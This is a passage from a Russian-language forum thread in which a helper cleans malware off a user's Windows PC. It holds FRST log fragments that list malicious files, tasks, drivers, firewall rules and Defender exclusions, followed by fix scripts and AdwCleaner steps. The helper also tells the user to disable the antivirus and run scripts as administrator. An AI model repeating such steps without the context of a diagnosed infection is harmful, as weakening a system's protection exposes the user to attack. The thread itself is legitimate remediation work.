C:\Users\Компауктер\AppData\Roaming\r5cphmyvv4n 2019-07-18 01:29 - 2019-07-18 13:02 - 000002890 _____ C:\Windows\System32\Tasks\mrAArNosEtAJT2 2019-07-18 01:28 - 2019-07-18 13:02 - 000002850 _____ C:\Windows\System32\Tasks\JSpPUlYEOjGQEpF2 2019-07-18 01:28 - 2019-07-18 01:32 - 000000000 ____D C:\Program Files\NUYSL1VMVS 2019-07-18 01:28 - 2019-07-18 01:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0 2019-07-17 23:49 - 2019-07-17 23:49 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\ch51whag4gk 2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\Users\Все пользователи\AppxeetouQ 2019-07-17 20:12 - 2019-07-17 20:12 - 000000000 ____D C:\ProgramData\AppxeetouQ 2019-07-18 02:29 - 2019-02-17 02:38 - 000000000 ____D C:\Windows\System32\Tasks\WiseCleaner 2019-07-15 15:11 - 2019-02-17 02:44 - 000000000 ____D C:\ProgramData\ProductData 2019-07-17 19:56 - 2019-07-17 19:56 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe 2019-07-17 23:49 - 2019-07-17 23:49 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe 2019-07-17 16:58 - 2019-07-17 16:58 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe 2019-07-18 01:28 - 2019-07-18 01:28 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe 2019-07-18 12:42 - 2019-07-18 12:42 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe 2019-07-18 13:02 - 2019-07-18 13:02 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe 2019-07-17 16:24 - 2019-07-17 16:25 - 001866371 _____ ( ) [File not signed] C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe 2019-07-18 12:42 - 2019-07-18 12:42 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe 2019-07-18 13:02 - 2019-07-18 13:02 - 001005568 _____ (1VYUW) [File not signed] C:\Program Files\KACSYMBLU9\KACSYMBLU.exe AlternateDataStreams: C:\ProgramData:NT [40] AlternateDataStreams: C:\ProgramData:NT2 [672] AlternateDataStreams: C:\Users\All Users:NT [40] AlternateDataStreams: C:\Users\All Users:NT2 [672] AlternateDataStreams: C:\Users\Все пользователи:NT [40] AlternateDataStreams: C:\Users\Все пользователи:NT2 [672] AlternateDataStreams: C:\ProgramData\Application Data:NT [40] AlternateDataStreams: C:\ProgramData\Application Data:NT2 [672] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40] AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [672] AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT [40] AlternateDataStreams: C:\Users\Все пользователи\Application Data:NT2 [672] AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT [40] AlternateDataStreams: C:\Users\Все пользователи\MTA San Andreas All:NT2 [672] AlternateDataStreams: C:\Users\Компауктер\Application Data:NT [40] AlternateDataStreams: C:\Users\Компауктер\Application Data:NT2 [672] AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT [40] AlternateDataStreams: C:\Users\Компауктер\AppData\Roaming:NT2 [672] MSCONFIG\startupreg: 1199918 => "C:\Users\Компауктер\AppData\Roaming\g50vfje1sxm\kw2oujfetig.exe" /VERYSILENT MSCONFIG\startupreg: 7408991 => "C:\Users\AD35~1\AppData\Local\Temp\is-D57PA.tmp\Quaturnion.exe" /VERYSILENT MSCONFIG\startupreg: App => MSCONFIG\startupreg: M1EL7DP7TFB4IWX => "C:\Program Files\GV2XUUQ3YK\GV2XUUQ3Y.exe" FirewallRules: [{FB5A14E1-04D2-4CEE-A479-F9D0F041499A}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File FirewallRules: [{729D7CE2-0A8F-481C-9EAD-416651D2C2B2}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DriverBooster.exe No File FirewallRules: [{63BD42EC-C9A8-4A5E-A1AC-969747C9267B}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File FirewallRules: [{B1094B8F-D703-466E-8417-82510E712F46}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\DBDownloader.exe No File FirewallRules: [{63460EDA-4745-45E6-8B5C-BF1EFE08E203}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File FirewallRules: [{129D4C2A-2AED-4237-ACD5-7D60625F594C}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\6.2.1\AutoUpdate.exe No File FirewallRules: [{817F3311-789D-4731-B1C5-197701BE0F59}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{2CF5048C-65B0-4D16-A2BD-FAD205FAC702}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed] FirewallRules: [{2FA76B23-FC7F-4FB9-9D51-693C1EDC089F}] => (Allow) C:\Users\Компауктер\AppData\Local\Temp\csrss\lsa64.exe No File FirewallRules: [{A2299063-532E-407A-85F9-8A7D957B79AE}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{36FA02A3-85F3-44EE-B5E8-26EF6D6DC4FB}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed] FirewallRules: [{9215F551-7558-4FD7-99FA-E1510C569A05}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] FirewallRules: [{82AF2ECB-DB19-4F36-B8C5-24086FA7ADBE}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed] FirewallRules: [{10B37ED2-AD39-4631-85DF-C8CAA33D8F89}] => (Allow) C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed] FirewallRules: [{E83CD806-C03A-47FE-A1EA-53EE6E86272D}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed] ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions EmptyTemp: Reboot: End:: - Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
я удалял, само опять
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
Еще один скрипт, пожалуйста.
Подробнее читайте в этом руководстве.
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe Reboot: End:: - Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
Судя по логам, значительно лучше. Ещё кое-что подчистим.
Подробнее читайте в этом руководстве.
Затем:
Подробнее читайте в этом руководстве.
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Код:Start:: CreateRestorePoint: Task: {4F0A3FA6-863C-4334-90BA-BDA2BEDC20B5} - \mrAArNosEtAJT2 -> No File <==== ATTENTION BHO: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\tl6Js7s.dll => No File BHO-x32: YoutubeAdBlock -> {7F5C0C11-7E68-4D65-868E-AE2BE9EEB44E} -> C:\Program Files (x86)\vONNFjhTKIE\k5C7RZn.dll => No File FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT R1 27dc587942c7edb8; C:\Windows\system32\drivers\27dc587942c7edb8.sys [30912 2019-07-17] (BlockChain Advances Ltd -> FsFilter Network) S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X] 2019-07-18 12:45 - 2019-07-18 12:45 - 001435136 ____H C:\Windows\windefender.exe 2019-07-18 12:44 - 2019-07-18 12:44 - 000023272 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\WinmonFS.sys 2019-07-18 12:44 - 2019-07-18 12:44 - 000009352 _____ C:\Windows\system32\Drivers\Winmon.sys 2019-07-17 19:56 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\4qavsr3x335 2019-07-17 16:58 - 2019-07-18 14:35 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\crnof3twn1e 2019-07-17 16:08 - 2019-07-17 16:08 - 000000128 _____ C:\ProgramData\appdata.dat 2019-07-17 16:05 - 2019-07-17 16:05 - 000030912 _____ (FsFilter Network) C:\Windows\system32\Drivers\27dc587942c7edb8.sys 2019-07-17 16:04 - 2019-07-18 13:22 - 000000000 ____D C:\Program Files (x86)\Sending 2019-07-17 16:03 - 2019-07-18 13:24 - 000000000 ___HD C:\Windows\rss Reboot: End:: - Скопируйте выделенный текст (правой кнопкой - Копировать).
- Запустите FRST (FRST64) от имени администратора.
- Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Затем:
- Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
- Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
- Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Sxx].txt (где x - любая цифра).
- Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.
- Сообщения
- 5,698
- Реакции
- 1,884
- Баллы
- 563
Еще раз:
Подробнее читайте в этом руководстве.
- Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
- В меню Настройки включите дополнительно в разделе Базовые действия:
- Сбросить политики IE
- Сбросить политики Chrome
- В меню Панель управления нажмите Сканировать.
- По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
- Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
- Прикрепите отчет к своему следующему сообщению
Подробнее читайте в этом руководстве.
